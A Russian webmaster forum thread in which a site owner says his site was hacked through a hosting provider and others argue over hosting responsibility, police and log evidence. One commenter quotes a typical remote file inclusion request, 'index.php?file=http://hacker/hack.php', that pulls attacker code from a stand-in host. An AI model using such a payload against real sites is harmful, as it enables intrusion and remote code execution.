- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Угу!
А потом обвинять столичных гастарбайтеров, чтобы были поразборчивей с выбором объекта для кражи
Отдел K на другом этаже
Не совсем ясно причем тут "Петербургского" и "сибирские". А что если бы это был московский хостер или сайты были бы "китайские" что то изменилось бы? Взлом есть взлом где бы он не происходил и кто бы его не производил. Что касается самого факта то вырубать сервер на котором хз что происходит (вполне возможно миллионные сделки через него проводятся) тем более после того как взлом уже был осуществлен как то бессмысленно. Таких "взломов" пруд пруди в сети и чаще всего просто подбирают пароль (а что разве редкость поставить себе пароль на аккаунт 12345 ?) а дальше дело техники. Скорее всего это какой нибудь червяк который саморазмножается. Бесспорно меры принимать надо но, "кричать" об этом на всех форумах малополезно и даже опасно (даете наводку другим хакерам и кроме того сами себя покажете в весьма невыгодном свете. Я понимаю что впервые потерять девственность (в плане атак хакеров) больно и неприятно но, увы это рано или поздно это случается со всеми. Избежать этого совсем очень сложно и дорогостояще но, попытаться тем не менее можно и для этого у вас как вебмастера есть достаточно средств.
ТСу надо идти в милицию, писать заявление, им предоставлять все логи, еще что есть. И уже правоохранительные органы будут общаться с хостером, смотреть, искать. А так что Инфобокс сам будет делать? Да ничего :)
Как он должен разборчивее искать клиентов? Не может же он (да и любой другой хостер) читать мысли клиентов и знать кто-что будет делать и размещать. Да и сайт тот, парвильно выше говорили, мог быть взломан.
ТСу надо идти в милицию, писать заявление, им предоставлять все логи, еще что есть. И уже правоохранительные органы будут общаться с хостером, смотреть, искать
Ну, во-первых чтоб логи чего-то стоили как доказательство, их нужно заверить хотя бы печаткой самого хостера выдавшего эти логи.
А насчет правоохранительных органов, вот все так на на них тут прям возлагают надежды. А не забыли ли вы, в какой стране вы живете? Вы сталкивались вообще когда-нибудь с милицией? Или возможно у Вас есть какие-то знакомые в милиции?
Скажу так, в милиции дела не расследуют! Им просто некогда разбираться во всех делах. Закрываются дела, которые являются уже полностью доказанными, остальные переходят в дальний ящик.
Данное дело в любом случае требует дополнительного расследования. Им заниматься никто не будет. Тем более дело межрегионального характера. Ментам проще приехать к Васе Пупкину, и выругать его за то что бесплатно в интернет заходит под чужим паролем, и показательно снять свою гениальную работу на видео для ТВ.
Не совсем ясно причем тут "Петербургского" и "сибирские". А что если бы это был московский хостер или сайты были бы "китайские" что то изменилось бы? Взлом есть взлом где бы он не происходил и кто бы его не производил. Что касается самого факта то вырубать сервер на котором хз что происходит (вполне возможно миллионные сделки через него проводятся) тем более после того как взлом уже был осуществлен как то бессмысленно. Таких "взломов" пруд пруди в сети и чаще всего просто подбирают пароль (а что разве редкость поставить себе пароль на аккаунт 12345 ?) а дальше дело техники. Скорее всего это какой нибудь червяк который саморазмножается. Бесспорно меры принимать надо но, "кричать" об этом на всех форумах малополезно и даже опасно (даете наводку другим хакерам и кроме того сами себя покажете в весьма невыгодном свете. Я понимаю что впервые потерять девственность (в плане атак хакеров) больно и неприятно но, увы это рано или поздно это случается со всеми. Избежать этого совсем очень сложно и дорогостояще но, попытаться тем не менее можно и для этого у вас как вебмастера есть достаточно средств.
Ой, ну какое же всё розовое...😂
Посмотрите на сайт этого ИнфоБокса - ну какие же они крутые! Только вот произошло это всё-таки от них.
Когда обычный арендодатель пускает к себе арендаторов или предприятие получает лицензионно-разрешительные документы, то всё, худо-бедно, всё же как-то контролируется.
А вот если на хостинге что-то не так, то это уж типа нормально - ничего не поделаешь... Вот от таких "хозяев" беды и случаются в Интернете, которые сейчас и наблюдаем повсюду.
Если это сделано кем-то извне на этом ИнфоБоксе, то тогда ещё хуже - значит, ТАКОЙ ХОСТИНГ. И случиться с его любым нормальным клиентом может тогда что-то и похуже.
Вот и думай тут всякому веб-разработчику - об этой компании. Как они бабки рубят, собирая у себя дешёвые решения и сомнительных клиентов.
(GoodWin) добавил 05.02.2010 в 07:27
Ну, во-первых чтоб логи чего-то стоили как доказательство, их нужно заверить хотя бы печаткой самого хостера выдавшего эти логи.
Да, конечно, я их сам написал, чтобы немного поразвлечься.😂
P.S. До сих пор, кстати, ответа вразумительного нет. Каждая минута их молчания говорит о том, что это действительно неприятность и непрофессионализм.
Ой, ну какое же всё розовое...😂
Посмотрите на сайт этого ИнфоБокса - ну какие же они крутые! Только вот произошло это всё-таки от них.
Когда обычный арендодатель пускает к себе арендаторов или предприятие получает лицензионно-разрешительные документы, то всё, худо-бедно, всё же как-то контролируется.
А вот если на хостинге что-то не так, то это уж типа нормально - ничего не поделаешь... Вот от таких "хозяев" беды и случаются в Интернете, которые сейчас и наблюдаем повсюду.
Если это сделано кем-то извне на этом ИнфоБоксе, то тогда ещё хуже - значит, ТАКОЙ ХОСТИНГ. И случиться с его любым нормальным клиентом может тогда что-то и похуже.
Вот и думай тут всякому веб-разработчику - об этой компании. Как они бабки рубят, собирая у себя дешёвые решения и сомнительных клиентов.
С вашей стороны конечно хостер самый плохой и не прав. А вы знаете хоть одного хостера, у которого бы никогда не было клиентов, которых взламывали или которые даже занимались "нехорошими" делами? Я таких хостеров не знаю.
Вам со своей колокольни судить легко. А вы представьте, когда вы сдаёте в аренду 100-200 хотя бы серверов. И что, вы будете каждый день заходить на сервера и смотреть, что там происходит?
Да, забыл, нужно ещё на детекторе лжи проверять каждого клиента, чтобы понять, что его намерения точно хорошие.
Да, конечно, я их сам написал, чтобы немного поразвлечься.😂
Я имел ввиду как доказательство для милиции или в суде.
(GoodWin), лучше скажите другое. Главный вопрос для Вас должен быть сейчас не Кто?, а Как?
Вы нашли уязвимость через которую взломали Ваш сайт? Опишите её здесь(подбор пароля к панели/FTP, или уязвимость в скриптах). По-моему как раз именно с этого нужно было начинать тему.
А насчет логов, у меня у самого таких логов с попытками взлома хватает. Причем регистрируешь пачку доменов, только ставишь заглушку, начинаются однотипные попытки взлома на каждый из доменов. В основном это попытки, чтоб мой хостинг выполнил специальный php код с другого сайта.
Я уже не говорю об огромных логах подбора паролей к root на сервере с разных IP-адресов по базе англоязычных слов.
Вот, вот такого плана атаки на мои сайты самые частые:
http://victim/index.php?file=http://hacker/hack.php (Лень рыться в логах. Взял отсюда)
Я имел ввиду как доказательство для милиции или в суде.
(GoodWin), лучше скажите другое. Главный вопрос для Вас должен быть сейчас не Кто?, а Как?
Вы нашли уязвимость через которую взломали Ваш сайт? Опишите её здесь(подбор пароля к панели/FTP, или уязвимость в скриптах). По-моему как раз именно с этого нужно было начинать тему.
А насчет логов, у меня у самого таких логов с попытками взлома хватает. Причем регистрируешь пачку доменов, только ставишь заглушку, начинаются однотипные попытки взлома на каждый из доменов. В основном это попытки, чтоб мой хостинг выполнил специальный php код с другого сайта.
Я уже не говорю об огромных логах подбора паролей к root на сервере с разных IP-адресов по базе англоязычных слов.
Вот, вот такого плана атаки на мои сайты самые частые:
http://victim/index.php?file=http://hacker/hack.php (Лень рыться в логах. Взял отсюда)
Вот это из логов:
И картинка с текстом самого эксплоита.
Другие подробности сообщу позже.
Кстати говоря, мой хостер ещё давно предлагал сделать IPtoFTP-маскИрование. Но ранее это было сделать невозможно из-за беспорядка в IPs моего провайдера (к сожалению, мой интернет и мой этот сайт - разные компании). Но теперь это можно сделать, только придётся аж писать официальное письмо на имя директора филиала нашей "Сибирьтелеком" (исходящий Веб-Стрим). Вот, кстати, где ещё причина - провайдер, как правило, отказывается назвать всю свою сетку, из которой легально может происходить администрирование сайта. По WhoIs выдаётся один диапазон, а реальные IP подключения бывают и из других. И что, сидеть неделями и фиксировать свои IPs?
Причина всех таких интернет-бед - идиотизм и непрофессионализм именно провайдеров и хостеров. Ставили бы тщательные решения и разъясняли бы клиентам на первых страницах - ничего бы этого не было вообще.
Это вам так кажется. Я бы посмотрел, как бы вы заговорили, если бы взломали ваш сервер и стали другие атакавать. Поверьте, всё взламывается, вопрос только в количестве усилий и цене.